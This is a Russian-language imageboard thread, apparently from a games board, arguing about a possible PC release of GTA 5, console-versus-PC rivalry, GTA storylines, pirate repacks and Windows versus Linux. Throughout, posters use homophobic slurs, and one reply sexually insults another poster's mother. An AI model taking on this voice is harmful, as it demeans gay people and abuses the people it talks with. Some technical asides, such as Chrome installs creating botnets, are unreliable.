— Пидора ответ — заключил Сократ.
>>7884466
Ебаный чатик,а не тред. Верните консолесрач и ваногвания!
>2014
>пекабеливы
Не выйдет она на пека, дауны ебаные.
>>7888962
>Прими себя таким, как ты есть
Отвратительная фраза, кстати. Это значит, что ни работать над своими недостатками, ни саморазвиваться в целом уже как бы ни не нужно.
Вы охуели чтоле тут пидорасню разводить? Совсем уже ебанулись, жополазы даже до моего уютного /vg/ добрались.
>>7889202
Поддвачну. Съебите в /b/ или откуда вы там лезете, дауны.
Дайте список пидоров, которые есть в жта 5.
>>7889202
>даже до моего уютного /vg/ добрались
Они отсюда, как бэ, никогда никуда и не уходили.
>>7889281
Это может быть на форчане они там давно прописаныисходя из треда, который здесь создавал когда - то их местный русскоговорящий анон но сюда им смысл идти? Пусть сидят в своём драгон эйдж треде, а свои волосатые дупла сюда не суют.
>>7887741
>Клод
>альфа
Ну уж точно не выше Сиджея. Даже Сиджей над ним смеётся и называет его немым омеганом.
>>7889293
Чтобы им засунуть свои волосатые дупла, их, для начала, надо достать, чего они не делали. Бугуртить тут на жопотрахов всё равно, что в а на аниме.
А почему никто Хуана Ли не помнит? Он тоже годным протагонистом был, хоть и узкоглазый.
>>7889351
Потому что большая часть треда не играла в чайнатаун ворс.
Хули вы тут устроили, пидоры?!
Ну что сучечки?
>>7889414
блять, а я на 100 прошел только 5, и ту только что.
>>7889574
Да ты охуел, я еще в General-GTA треде хвастался супом с миссией амбуланса и говорил что буду проходить трешку на 100%
>>7885337 Первый мгс, второй мгс, райзинг. Не было из современный митолгиров только трёшки и четвёрки. Но пекабоги трёшку могут свободно сэмулировать с ахуенным графоном, не покупая ЭЙЧДИ ЭДИШОН за 2500. Такие дела. хотя я в своё время ради третьей части покупал вторую соньку
>>7889600
Алсо, когда смотрел спидран трешки(за 1:16, вообще охуеть), то моя челюсть упала вниз и пробила нефтяную скважину, унесшую меня на Альфа Центавру, когда я увидел как спидранер управляет Додо.
После миссии Grand Theft Aero он каждую миссию выполняет на Додо, машинами практически не пользуется. Грамотно взлетает, грамотно садится.
>>7889610
>свободно сэмулировать
Дал бы пизды тебе за такие слова.
Два года пытаюсь сэмулировать, нихуя не робит.
Может дело в том что у меня АМУДЕ?
>>7889703
Мне неинтересна новая линейка ГТА. После воплей школоты там миссия Парамедика хоть может пукан воспламенить, а? В СА уже нужно было развезти 50 клиентов, а в 5ке сколько? 10?
Да вы ахуели. Пидорам нравится гта5? Но их же в игре обосрали, подъебнули всю их качку прав, их гей-парады, подъебнули биоварей с их дебильными персонажами с нетрадиционной сексуальной ориентацией и прочими заебами.
> Каждый настоящий и уважающий себя гташник должен пройти GTA 4 на сто процентов. Сделать это очень не просто. Люди, достигшие этой высоты, действительно заслуживают большого уважения.
http://www.libertycity.ru/allarticles/gta-iv-articles/371-prokhozhdenie-gta-4-na-100.html
>>7889743
Какая миссия медиков, ты еще про миссию пожарников вспомни, поехавший. Ты представляешь себе, что какой-то левый хуй с горы забирает скорую и начинает на ней работать? В реальном мире такое может быть? Вот и в V так же! Забудь уже всю ту клоунаду, что была раньше, это совершенно другой уровень режиссуры и реализма.
>>7888844
Лол
>>7889765
Этим мне и не нравится новая серия. Вся 4ка напоминает какой-то Бумер или Бригаду с потугами на драматизм. А как же традиции?
>>7889765
>В реальном мире такое может быть? Вот и в V так же! Забудь уже всю ту клоунаду, что была раньше, это совершенно другой уровень режиссуры и реализма.
Сейчас представляю как в реальности какой-то левый хер пробирается на военную базу, ворует оттуда джет, ворует грузовой самолет, ворует ебанный танк и ведет его, стрелдяет из него в одиночку. Еще представил себе ручной миниган, еще представил как человек может себе в задний карман столько видов оружия положить, да еще и сотни патронов к каждому стволу.
Ахуеть, какая гта 5 реалистичная игра, просто
Лол.
Цетата одного из говнолексплееров с некросонсолькой:
"Имейте в виду что с покупкой ГТА5 на ПК в становитесь жертвой сговора Рокстар и нВидиа"
Пфффф ебать Мелкомягкие и Сосони так уже второе поколение подряд идиотов на хую вертят, а им нравится.
>>7889812
> жертвой сговора Рокстар и нВидиа
Даже если я пользуюсь продукцией нвидиа, я всё равно жертва сговора?
>>7889778
>А как же традиции?
Во всех ГТА есть персонажи-клоуны, созданные преимущественно для разрядки от всей этой драматы, и пятёрка - не исключение.
>>7888844
Я даже посмотрел. Пиздец там васянские причины отсутствия порта - пейратство, читерствопри этом он сам сказал что на консолях читерство цвело буйным цветом, какие-то высосанные 40 лямов убытков из-за мода хот кофиза каким хуем камнезвезды платили компенсации ЗА СТОРОННИЙ МОД?, СОТНЯ ПАТЧЕЙвот тут больше всего проиграл - васятка не понимает смысла патчей вообще, патч это волшебное леакарство для игры, чем больше их - тем лучше.
>>7889851
Пьяный подрывник, который умудрился оторвать себе руку. Непомню имя
>>7889882
Фил Кэссиди. И он появлялся в ГТА3, там он утверждал, что потерял руку в Никарагуа
>>7889838
>Во всех гта все персонажи - клоуны.
Пофиксил тебя, ведь гта всегда была комедийной серией, созданной в подпажание фильмам тарантино, гая ритчи и т.д. Собсно, в это и не малая часть ее успеха - пока все другие пытаются изобразить какую-то хуйню на серьезных щщах, рокстар просто делают свою криминальную комедию и побеждают. Потому что сделать что-то серьезное и берущее за душу сложнее, чем хохмы, тащемта.
>>7889887
Да это он. В трешку не играл.
В VC я до сих пор как он набуханный пошёл проверять почему не рвануло. Оно рвануло и оторвало руку. Потом пришлось везти его в больницу, в то время как экран шатало от его амбрэ.
>>7889868
>гта 5 анонсирована для пека с улучшенной графикой
>>7889868
И на скриншоте ниже в новом трейлере гта 5 графон уже на порядок выше.
>>7889874
Это был не сторонний мод же. Они просто предусмотрели эту возможность в игре, но доступа игрокам решили не давать (ибо тогда на них гнали куда жестче чем сейчас), а на пк какой-то чувак залез в ресурсы игры и открыл доступ.
Но компенсаций больших они не платили, это его маняфантазии, просто выпустили патч и все.
>>7889896
А ещё постоянно пиздит про Вьетнам.
Вроде ещё Томми при разговоре с Митчем Бэйкером упоминал, что он был во Вьетнаме, поправьте если ошибаюсь.
Лолед
>>7889868
Я вижу что у консолебляди порванная жопа и виндоусхп
>>7889874
>за каким хуем камнезвезды платили компенсации ЗА СТОРОННИЙ МОД?
Суть в том, что мод менял одну цифру на другую - 0 на 1.
Хот коффи уже был в игре, зашитый самими роками.
>>7889893
В том то и проблема, что четверку они попытались сделать серьезнее и она сразу вышла говном из-за этого.
>>7889887
Причем ему в ВС оторвало правую руку, а в трешке у него нет левой руки.
>>7889936
> четверку они попытались сделать серьезнее
Это только на первый взгляд. На самом деле она едва не комичней предыдущих частей.
>>7889936
Но ведь там присутствует DRAMAH!
Нико ищет кто тогда подставил отряд. К тому же ему делает подсеру Дмитрий которого он в последствии тоже жаждет ГРОХНУТЬ НАХУЙ потому-что сука предательство оставило на Нико отпечаток.
>>7889939
В сша из-за любой хуйни могут подать в суд, надеясь, что сгребут бабла из-за "маорального ущерба" или еще какой мелочи, но в подавляющем большинстве случаев проигрывают такие дела.
Один томпсон как обосрался в свое время, наехав на гта.
>>7889945
Это только в ролике перед миссией такой косяк был. Когда отвозишь Фила, его таки показывают без левой руки.
>>7884527
Только вот никто не будет заниматься оптимизацией под весь ваш зоопарк. Так что опять будет ДРАМА с невозможностью запустить игру.
>>7889965
Ну ролики то каноничнее всегда, в них же история рассказывается.
>>7889970
Oh boy, here we go again. Я тебе уже рассказывал, что такое безумие?
А вообще... Кто скачает игру от какого релизера? Мне, например, механики нравятся.
>>7889998
У тебя что красный фонарь загорелся, что ты сюда пришел, Маня?
>>7890006
Я у габена скачаю. Он сразу установленные игры раздаёт, лишнее время тратить не нужно будет, а ещё у него мультиплеер не залочен.
>>7890006
А мне FatGaben13
>>7890006
А мне от габена нравятся. Всегда отличные релизы в день выхода.
>>7889679 Ну братиш, у меня вообще ноутбук с i5 и geforce 540m и 4гигами оперативы, и всё збс запускается, а если поколдовать с настройками то в 80% сцен и локаций фулфрейм даёт. И это на таком обрезке как мой ноут.
>>7890006
Дешевые провокации консоледурачка.
>>7890006
Скачаю у того, кто выложит первый. Если с оптимизацией нормально и на моем хламе будет приличный фпс, то куплю у Гейба. Если будет тормозить, то дропну до патчей или апгрейда, а там куплю опять же у Гейба.
>>7890006
с тапочек нет качаю. не очень люблю, когда крупные проекты выпускают наспех репакеры. жду несколько дней/недельку.
>>7890146
Ой ну да, иметь антивирусы в 2014 году ЭТА НИ МООООООДНА
И вообще, почему не перекатываемся в новый тред?
>>7890146
Обоссал этого постоянно участника ботнета с пачкой троянов на борту.
>>7890195
>>7890214
При чем тут это? Какие то вы троллефобы, срсли. Мне просто не понятно где вы эти самые вирусы подхватываете.
Если сказать за себя, то моему рабочему ноуту около двух лет. И сижу в интернетах по 25 часов в сутки, у меня почти тысяча активных вкладок в лисе и за это время ни разу не хватал никаких вирусов, вот вообще. Серьёзно, где вы их находите?
>>7890225
>тысяча активных вкладок
Ебаные каникулы, фантазеры вместо того, чтобы учиться, лезут на двачи.
>>7890225
Если ты пиратишь игры, то можешь подхватить вирус от любого репакера. А особенно, если репак вышел практически через день после релиза (тобишь репак делали наспех). В интернете много вирусов, а ты сейчас сидишь и не знаешь, если у тебя что нибудь, а оно в этот момент медленно убивает твой пк.
>>7885297
Справедливости ради, замечу - Кодзима, как и Конами, никогда не были сторонниками какой-либо платформы, четверка на Пс3 вышла только из-за того, что Сони вложили туда свои деньги.
И МГС5 скорее всего таки выйдет на ПК, где-нибудь через полгодика.
И да, вбрасывай расширенную версию лучшего трейлера этого года.
Лучший антивирус - здравый смысл. Ресурсы системы не ест, от Day 0 угроз спасает. Главное - не качать мокрые писечки безплатно без смс. А если уж так приспичело, то держи Sanboxie. Православный метод - это без антивируса и раз в месяц CureIt проверяться.
>>7890259
>здравый смысл
спешите видеть. в наше время даже при желании сложно троян подвхатить. речь идёт не о порно гей баннерах, и не троянах уровня бесконечное перекопирование пустых папок.
>>7890296
Именно здравый смысл. Ты не качаешь Хром - ты не состоишь в ботнете.
>>7890300
>Ты не качаешь Хром - ты не состоишь в ботнете.
Wat.
я думал, он безопаснее.
>>7890362
Если ты не забыл, то при установке Хрома ты соглашаешься на отправку инфы Гугелю.
>>7890371
ОБОЖЕ ТОЛЬКО НЕ ЭТО!
>>7890371
а. ну как будто фуррифоксы не собирают, или оперы.
да и всё в настройках редактируется, если не ошибаюсь.
>>7890448
Лол, PC надо было еще огромный болт пририсовать.
>>7890371
Какой ужас, как же мне сохранить анонимность во время дрочки на одноклассницу?!?!?!??!?!
Чому тонем?
>>7890791
Темы для срачей закончились. Вспыхнут по новой ближе к выходу новых версий ГТА.
>>7890828
>Вопросы треда:
1) Порт с некстгена или самостоятельная версия? В чем преимущества первого и второго?
2) Когда появится первая инфа? Предположительное время выхода?
3) Как Рокстар собирается поддерживать GTAO? Воркшоп в среде ЖТА, его преимущества и недостатки.
Ни на один не ответили.
>>7890257
>четверка на Пс3 вышла только из-за того, что Сони вложили туда свои деньги
Из-за проблем с ПС3-версией даже переносили выход игры с октрября 2007 на апрель 2008.
>>7890850
Мы тебе Rockstar чтоб отвечать?
Кроме домыслов и слухов нихуя более.
>>7890850
Не поможет. Тут чтобы хоть кого-нибудь расшевелить, нужно капсболдом написать, что КОНСОЛЕДЕТИ\ПЕКАШКОЛЬНИКИ (нужное подчеркнуть) СОСНУЛИ. Да и то после той вакханалии, что творилась вчера, вряд ли кто-то уже будет вестись.
>>7890862
У нас же ОБСУЖДЕНИЯ. Да и все прошлые треды были в домыслах.
>>7890850
1. Порт с очка твоей мамки. Оба преимущества - ее сиськи.
2. Как мамашу твою доебем. Когда твой батя из петухов выйдет.
3. Руками, как во время ебли твоей мамки. Ротожоп в среду твой папка, это его недостаток.
Ни один не побрезговал его выебать.
Нашел тут бюро вопросов и ответов, в Рокстар пиздуй и у них спрашивай.
>>7890850
>Ни на один не ответили.
А кто тебе ответит? Никто не знает.
Тред потух петух :c
>>7890882
Прошлые треды просто упивались баттхёртом консолеблядей. Никогда не выйдет, не потянет два титана - вот это домыслы.
>>7890905
Все нормальные люди сейчас проводят весело время, не сидя за компьютером.
>>7890918
Не пизди сук, мне и за компом весело, в доте.
>>7890850
>1) Порт с некстгена или самостоятельная версия? В чем преимущества первого и второго?
Ни то, ни другое. Игра мультиплатформенная, а значит работает везде максимально хорошо.
>2) Когда появится первая инфа? Предположительное время выхода?
Думаю, через месяц-два. А выйдет, скорее всего, в конце сентября. Официальной инфы ещё нету.
>3) Как Рокстар собирается поддерживать GTAO? Воркшоп в среде ЖТА, его преимущества и недостатки.
Будет выпускать новые задания для онлайна. Воркшоп - возможность запилить собственные задания, наиболее охуенные будут одобряться Рокстаром лично. Ну а какие могут быть недостатки?
>>7890927
Сейчас там самое пекло
там скорее моя порванная жопа чем веселье
пустота
>>7888939
Что там за шум на улице, Бэрримор?
- Это сонибляди, сэр.
- И чего же они требуют, Бэрримор?
- Игр, сэр
- А у них разве их мало?
- Нет, сэр.
- Так почему же всё-таки они шумят?
- Пидорасы, сэр.
fix
>>7890979
Что там за шум на улице, Бэрримор?
- Это консолебляди, сэр.
- И чего же они требуют, Бэрримор?
- Эксклюзивов, сэр.
- А у них разве их мало?
- Нет, сэр.
- Так почему же всё-таки они шумят?
- Пидорасы, сэр.
final fix
трафик
>>7890930
Насчет третьего. Необязательно только это, может быть еще запилят как модотеку, было бы годно.
>>7891000
>Перегородил дорогу
>Трафик
Ох уж эти консолепотуги
>>7889756
В чем прикол на 100 проходить? Писюн от этого вырастет?
>>7891033
В RGSS статистику свою публиковать, чтоб все охуели как ты можешь.
>>7884466
Это на верхней картинке фото? Или это графика? Долго втыкал, так и не смог понять.
>>7891042
Да хватит пиздеть, всем уже давно известно про нулевой трафик.
Вы все лохи.
>>7890257
Никогда не понимал, почему все так дико дрочат на трейлеры Mgs V. Если человек, как я, не знакомый с серией, посмотрит этот трейлер то никаких эмоций он у него не вызовет. Хотя вон, с серией Deus ex тоже знаком не был, но от трейлера HR обкончался. Мне кажется, если они хотят привлечь новый народ к серии то, в их роликах нужно меньше кинца и больше геймплея, как в видеорелейтед, например: 0% кинца, 100% геймплея.
>лучшего трейлера этого года
У жта лучший трейлер.
>>7891145
>0% геймплея, 100% срежиссирвоанный пререндера
Починил маньку.
>>7891141
Если у меня гтх660, 8 гигов и ай 2400 вместо проца, возможно-ли накатить и не обосраться с просадками и вылетами?
>>7891157
У тебя почти такой же конфиг, как у автора видео.
>>7890257
Пом не так МГС это MAXIMUM на любителя. С одной стороны вроде какие-то серьезные элементы в сюжете, а с другой немая баба в бикини и со снайперкой.
>>7891186
>С одной стороны вроде какие-то серьезные элементы в сюжете, а с другой немая баба в бикини и со снайперкой.
Почему-то проиграл.
>>7891176
Тому что не окно.
>>7891202
Вся суть линекса в твоём пике. Оно может работать через самое последнее забитое богом место, ЗАТО ШВАБОДКА.
>>7891223
Интересно, на сей раз быдло поведётся на те игры, что были показаны на Е3 2014?
>>7891217
Лал, воинствующий спермач просыпается, стоит только выложить скриншот, сделанный на линукс, но не о линукс. У вас там детектор с шилом в жопе? Покая не даёт, что кто-то может настроить себе систему и пользоваться ей?
>>7891145
>SWAT 4
>You are in my way, sir.
>You are in my way, sir.
>You are in my way, sir.
>You are in my way, sir.
>You are in my way, sir.
>>7891231
Фар Цру 4, что ли? Ну геймплейно третья часть не так уж и плоха была, другое дело - сюжет. Так что от четвёрки, думаю, в основном того же ожидают. Один хрен первую часть им никогда не превзойти.
инб4 кря-кря, не гони на мою божественную Фар Край 3 и т.д.
>>7891231
Уже предзаказал фар край 4 Из-за коопного вышкоебства
В пятёрке можно так же душевно? Я имею в виду закат, повреждения кузова, кровь на капоте
Не видел пятёрку вживую
>>7891237
Ты какой-то ёбнутый. Я лишь спросил, в чём преимущество в линуксе, когда ту же винду, у которой аппаратная поддержка в сотни раз лучше, можно настроить под себя и без лишней мозгоебли?
>щас такой скажет АЗАЗАЗ НУ ТЫ ПОНЯЛ ЧТО ТЫ ЩАС ЛЯПНУЛ) ЛЮНЕКС САМЫЙ СТАБИЛЬНЫЙ, А ТЫ ПРОСТО НЕ АСИЛИЛ))
>>7891261
Ну так показали же графон уровня CGI-рендеров, а люди только хлопали.
>>7891314
Но в тройке хороший графон на ультре же.
Тем временем в /v/ форчана.
>>7891293
> в одном сообщении гринтекст с текущим годом
> в другом - капсболд SRACHSTYLE
Я там нормального вопроса не увидел.
> аппаратная поддержка в сотни раз лучше,
В каком месте она ЛУЧШЕ?
> можно настроить под себя
Окей. Я могу там запилить тёмную тему, убрать нахуй ненужные компоненты, типа подсистемы печати, сделать так, чтобы окно можно было раздекорировать/сделать поверх других окон? Вот хотя бы это? Я могу там быстро заменить комплект значков на другой? Курсор?
> без лишней мозгоебли?
Вот давай, как сделать то, что я выше перечислил без лишней мозгоебли.
>>7891299
Из модов только более подробная карта с указанием аптечек, лифтов и прочих полезностей. В комплекте шёл такой HUD для мини-карты и здоровья с бронёй.
>>7891345
Да у них же там БЛУДБОРН. Такого шитшторма как в тредах по этой игре даже у ГТА5 не было.
>>7891356
>В каком месте она ЛУЧШЕ?
Да взять то же аппаратное ускорение. Под виндой даже на калькуляторе 1080р будет летать, когда на линуксе я даже в 2014 замечаю ПОДЛАГИВАНИЯ, будто у меня 30 Гц монитор
>Окей. Я могу там запилить тёмную тему
Да.
>убрать нахуй ненужные компоненты, типа подсистемы печати
Я тебе даже больше скажу: есть официальные SDK для винды, на котором можно собрать СВОЙ СОБСТВЕННЫЙ дистрибутив винды с нужными компонентами.
>сделать так, чтобы окно можно было раздекорировать/сделать поверх других окон?
В реестре или через программу.
>Я могу там быстро заменить комплект значков на другой? Курсор?
Лол, так делали ещё на Windows 98.
>>7891348
Ну да, но в итоге хоть не вотч догс вышел.
>>7891398
Этот бладборн уже сейчвс выглядит таким редкостным говном. С дарк соуслом даже не сравнить.
>>7891427
Все равно Цитра лучше.
>>7891406
> Да взять то же аппаратное ускорение.
VDPAU/VAAPI
> Да.
Будет также как на пике? Напоминаю - темная тема это не только тёмный цвет панельки и декораций окна.
> Я тебе даже больше скажу: есть официальные SDK для винды, на котором можно собрать СВОЙ СОБСТВЕННЫЙ дистрибутив винды с нужными компонентами.
Как насчёт убрать из уже установленной? А этот официальный SDK в открытом доступе или как обычно - на торрентах?
> В реестре
> без лишней мозгоебли
Лол. Этим должен заниматься менеджер окон и делать это на лету, не залезая в конфиги.
> или через программу.
Нужно что-то дополнительно искать? О вау. Напомнить, что практически любой менеджер окон в Лине это умеет?
>Я могу там быстро заменить комплект значков на другой? Курсор?
Ну-ка, покажи окно, где я могу разом сменить значки/курсор на другие, а не по одному.
>>7891472
Неужели линукс лучше винды только из-за всей этой мелочной хуиты?
Мимо-нихуя-не-разберающийся
>>7891499
Я привёл только то, что пришло в голову сразу на
> можно настроить под себя и без лишней мозгоебли.
Я не буду упоминать про FHS, где всё есть файл, про удобные репозитории с большим количеством софта, про разделяемые библиотеки, про устройства, которые подхватываются чуть ли не сразу при условии, что оно соответствует стандартам и так далее.
>>7891553
Но дадут только ебнутую в ебнутой концовке.
>>7891568
Но в другой концовке уплываешь закат именно вместе с Лизой.
А Цитру ГГ так или иначе один раз трахает.
>>7891472
>VDPAU/VAAPI
Неебу что это такое. Почему я ещё должен что-то системное донастраивать за разработчиками в 2014?
>Будет также как на пике?
Да. Поищи в гуглокартинках "темная тема windows".
>Как насчёт убрать из уже установленной?
Оцифицально только отключить, но есть и тулкиты, которые вырезают из установленной системы.
>А этот официальный SDK в открытом доступе или как обычно - на торрентах?
Всё бесплатно скачивается из сайта Майкрософта. Мануалы даже на ютубе есть.
>Нужно что-то дополнительно искать? О вау. Напомнить, что практически любой менеджер окон в Лине это умеет?
И что с того? Тот же Вася из 8Б мог засунуть в дистрибутив винды любую другую программулину, разве в этом преимущество винды? Винда такая ОС с системой пакэджей, как и линукс.
>Ну-ка, покажи окно, где я могу разом сменить значки/курсор на другие, а не по одному.
Всё есть в гугле. Есть и готовые программы, где один раз нажал на кнопочку и будет тебе вау, есть и отдельно выложенные ресурсы для установка вручную. Хотя сейчас вручную никто не меняет, лол.
>>7891556
>Я не буду упоминать про FHS, где всё есть файл
VHD/WIM
>про удобные репозитории с большим количеством софта
Такие же репозитории существуют для винды (умолчу уже о Windows Store в восьмёрке)
>про устройства, которые подхватываются чуть ли не сразу
Ты в каком году застрял, дружище? Сейчас винда даже китайские ноунейм девайсы подхватывает, и драйвера устанавливаются без перезагрузки.
>>7891590
В другой концовке нихуя не ясно и нихуя не показывают.
>>7891664
Все там ясно. Главный герой посылает Цитру на хуй и говорит, что не будет участвовать в задуманном ею говне. Он решает, что раз уж так долго рвал себе жопу ради друзей, то и вытащить их всех отсюда надо будет обязательно.
Цитра злиться на него, рыдает, все дела и тут прибегает этот ниггер-очкарик из начала (забыл как его звать) и говорит "не смей так обращаться с моей любовью, с моей королевой", пытается зарезать ГГ ножом, но случайно убивает Цитру. Все их ебанная деревня в ахуе от произошедшего и даже не обращают внимания на главгера, когда он отвязывает всех своих друзей и уходит оттуда.
Под занавес показывают тот самый ножик-хуежик из-за которого был весь сыр-бор и на его фоне катер со всеми героями уплывающий в закат.
>>7891467
Джвачую. Стыдно играть без такого годного мода.
>>7891612
> Неебу что это такое.
Пропиретарные дрова установи
> Да. Поищи в гуглокартинках "темная тема windows".
> Подготовленные системы для поддержки сторонних тем
> без лишней мозгоебли.
Нуёбтвоюжмать
> Оцифицально только отключить, но есть и тулкиты,
На лине лишний нежизненноважный компонент можно выпилить также легко, как установить что-нибудь. А тут снова какая-то мозгоебля, да скачай ещё программ.
> Всё бесплатно скачивается из сайта Майкрософта.
Где? Я найти не могу. Поделишься ссылкой?
> И что с того?
В одном случае - этот функционал присутствует изначально, в другом он появляется с помощью костылей. Чуешь разницу?
> Есть и готовые программы, где один раз нажал на кнопочку и будет тебе вау
В любом DE оно сразу есть.
>>7891636
> FHS - Filesystem Hierarchy Standard - Стандарт иерархии файловой системы
> VHD/WIM - форматы образов жёстких дисков
Сам-то понял, что спизданул?
> Такие же репозитории существуют для винды
Официальные от разработчика? И как много там софта? Ссылку пожалуйста.
> Сейчас винда даже китайские ноунейм девайсы подхватывает,
Вау. Рад за неё. Однако новые накопители ей нужно зачем-то минуту настраивать, прежде чем можно использовать. Почему?
> и драйвера устанавливаются без перезагрузки.
Достижение. Все? Алсо, сетевая карта у тебя сразу на стандартных дровах завелась или таки пришлось ставить кое-что с диска?
Напоминаю, основной тезис в
>>7891293
что Windows
> можно настроить под себя и без лишней мозгоебли
Я не увидел, что это так. На всё были ответы - гугли/скачай программу.
>>7891764
Зато лишняя мозгаебля всегда держит твою жопу в тонусе, лол
>>7891763
Самая популярная глобалка на Фар Сру 3.
http://www.nexusmods.com/farcry3/mods/63/?
В основном - хоркор. Но игра становится намного приятней. Хотя вышки теперь ничего не дают.
>>7891793
>nexusmods
>хоркор
Я думал, такое только на фоллачи да на тесы делают, лол.
>>7891914
На любуй из игор, которые есть на нексусе есть мод с ШКОЛОХОРКОРОМ же.
В Фар Кру 3 годный получается харкор.
Жаль, что каноничная концовка - Месть. Внезапный Пегорино вообще не тянет на финального босса никак, Дмитрий из денежной куда как логичнее.
>>7891995
>каноничная концовка
Штоу? Кто и когда говорил про то, какая концовка канонична, а какая - нет?
>>7891995
Ну лично я рассуждал так - Романа жалко, если застрелят, братишка всё-таки, да и прикольный он.
А пизду - ну и хуй с ней!
>>7891995
> что каноничная концовка - Месть
А там есть другая? Это в любом случае месть - или за брата, или за пизду.
>>7892069
Нет, имеется в виду месть Дмитрию либо сделка с ним.
>>7892077
Я сделку брал, потому что пизду не жалко.
Хотя роман тоже не цветочки. Хэй, Нико, летс гоу боулингъ
>>7892102
Не перепутал?
Сделка = пизда посылает тебя нахуй и не идёт на свадьбу - погибает Роман.
Месть = пизда идёт с тобой на свадьбу и погибает.
>>7891994
Там самому весь хардкор настроить легко, на анреале же игра.
Хотя достаточно просто не прокачиваться.
>>7892045
> Кто и когда говорил про то, какая концовка канонична, а какая - нет?
В ГТА 5 можно найти страничку Нико в социальной сети, и у него там Роман в друзьях, значит жив. А выживает он только в одной из концовок.
инбифо это пасхалка, ничего не значит!!! он мог завести страничку до его смерти!!!
>>7892199
Погодь, если человек умирает, то его в соцсети удаляют из друзей?
>>7891145
Я посмотрел первый трейлер MGSV, обкончался от стилистики, режиссуры, ГГ и песни. И решил поиграть в первую часть на ПеКа. После прохождения я кончил во второй раз, потому что таких геймплейных фишек и сюжетных поворотов даже в современных играх редко увидишь, представляю какой восторг она вызвала в начале нулевых. Вторую и 3. часть я так и не смог запустить, но когда-нибудь мне это удастся.
>>7892219
Нет. Но вот после смерти добавить в друзья проблематично.
>>7892272
Покупай плойку, играй в 3 остальных номерных в лучшем качестве. Кончишь от каждой, базарю.
Хоть я и начал свое знакомство с чертверки, но я был настолько ошарашен уровнем проработанности всего и вся, что в срочном порядке прошел всю серию с 1й по 4ю и окончательно убедился: МГС - лучшая игровая серия за всю игровую историю, из поколения в поколение каждая игра этой серии ставила планки качества разработки игр и продолжала раскрывать историю про Биг Босса и его сыновей.
>>7892318
Хочу дождаться, когда выпустят все части на плойке4. Надеюсь, это случится рано или поздно.
Давайте снова ванговать требования пк. На максималках пойдет, если у тебя проц 3,5 ггц, видяха с 2 гб видеопамяти, 8 гигов оперативы.
>>7892489
Не буду ничего ванговать. Я лучше куплю себе 780 на 4 гига, 8 гигов йобаоперативки с частотой 2100 и какой-нибудь топовый ай7.
Тогда мне будет абсолютно похуй на системки вплоть до 2020 (разве что видеокарту иногда менять придется)
>>7892489
Ну что за мудак? У меня если пень 4 с 3.5 ГГц тоже пойдёт? А то, что некро-квад на 40% медленнее Хасвелла на 3.5, ничего? Или Эльдо-варинант ИГРОВАЯ ВИДЕВОКАРТА НВИДИЯ ГЕФОРС ЖТ630 4 ГБ ddr3 тоже потянет? GTX 770 с 2 ГБ мощнее этой видеокарты же.
Мне тут обещали, что в Гее Тони будут охуенные задания и лулзы.
\Первая миссия действительно порадовали - бить чиновника мячами для гольфа. А потом...
Луис, я хочу забрать эту точку, убей их всех!
Луис, нас накрыли копы, убей их всех!
Луис, китайцы нас наебали, убей их всех!
Зато оружием просто засыпают, ракетницу и калаш уже на второй миссии можно получить.
>>7892489
Мне кажется что на максимуме ни у кого не запустится почти. Сделают задел на будущее по дальности прорисовки, чтобы не было как с СА, когда даже на нынешних пк объекты из воздуха возникают.
>>7892553
Знатно я обосрался. Посоветуй, что почитать по этой теме.
Что мы будем делать в этих тредах еще 3 месяца?
>>7892652
А ты будешь играть в онлайн? Или скачаешь пиратку?
Я, как обладатель PS3, PS4 и PC, вдоволь посмеялся над срачами школьников на протяжении последних 2-х лет.\
Даже долбоебу понятно было сразу, что игра выйдет на PC (про некстген консоли было непонятно) через 8-12 месяцев. Так было всегда. Но школьники с потными мордами, потными ручками и сальными волосами, с из драгоценными консолечками, купленными ими мамами на новый год с рук за по цены, орали и верещали, что на PC никогда ничего не выйдет, ведь RDR-же! Он же не вышел! Значит и GTA V не выйдет!
С другой стороны такие же детишки с мышками в сале, клавиатурами, между кнопок которых видны остатки еды за последние лет 5, и компуктерами для учебы, купленными мамками в честь окончания начальной школы плакали, писали петиции и дрочили свои пипки на видеоролики и прохождения игры на ютубе, а потом от злости писали гневные и полные боли посты на форумах, двачах и прочих местах обитания им подобных, где визжали, что игра говно для школьников.
Зато сейчас 1-е что-то поутихли, 2-е стали такими уверенными, постят смещные картиночки, как
>>7884595
, но мы то помним, как ещё пару месяцев назад, они дрочили на видеоролики игры и подписывались под шестисоттысячной петицией.
Я все знал с самого начала, так было всегда, и как убедились все мы - будет и впредь. Но, как и всегда, через лет 5 вся эта история опять повторится с новой GTA 6 (про RDR 2 загадывать не буду)
>>7891348
Но ведь разницы нет. Ну да, изменили положение деревьев и расстояние от берега до берега, но это уже не графон, а левел-дизайн.
>>7892658
Конечно куплю, я же не хикка, будем ввосьмером-вдесятером набегать. Надеюсь что лимит людей на серверах повысят.
Надеюсь, знаменитый БАГ с воротами не уберут, а оставят как ФИЧУ
>>7892489
>если у тебя проц 3,5 ггц, видяха с 2 гб видеопамяти, 8 гигов оперативы.
Intel [email protected], gt9600 2gb, 8gb ddr2. Потянет, нэ?
>>7884466
Как заставить эпизоды иметь такой графон? Я знаю, что это iEnhancer, но он выдает у меня какую-то зашумленную рябь вместо картинки. Я даже пачти нужные ставил - и все равно.
>>7892725
Сука, мажор ёбаный! Мамка купила - теперь повыёбываться решил?
>>7892748
Ты чо, сам купил. Промоутером все лето работал.
>>7891438
Просто дарк соулс поставили на поток. Теперь каждый год будет выходить хотя бы одна игра в этом духе, пока игроков не заебет покупать этот backstabfest.
>>7892820
> пока игроков не заебет покупать этот backstabfest
Ну это долго придется ждать. Какая там колда по счету?
>>7892682
100 человек - ну охуеть вопщи!
Лучше бы за предзаказ выступали - это дело. А ранний доступ и так уже куча недолюдей получили.
ГТА онлайн будет сразу доступна с выхода? Я надеюсь, что её задержат, чтобы можно было в сингл поиграть.
>>7891764
>Подготовленные системы для поддержки сторонних тем
Ты чего? Там всего-лишь патчится одна библиотека.
>На лине лишний нежизненноважный компонент можно выпилить также легко, как установить что-нибудь. А тут снова какая-то мозгоебля, да скачай ещё программ.
Повторюсь: собираешь дистрибутив с тем, чем нужно, интегрируй туда всё что хочешь и начисто установи.
>Где? Я найти не могу. Поделишься ссылкой?
http://www.microsoft.com/ru-ru/download/details.aspx?id=39982
>В одном случае - этот функционал присутствует изначально, в другом он появляется с помощью костылей.
>В любом DE оно сразу есть.
>Чуешь разницу?
Нет, не чую. Данная линуксовая фича не была лично написана Линусом, а была интегрирована в дистрибутив такими же Васями, которые пилят сборки с виндой.
>Я не буду упоминать про FHS, где всё есть файл
>Сам-то понял, что спизданул?
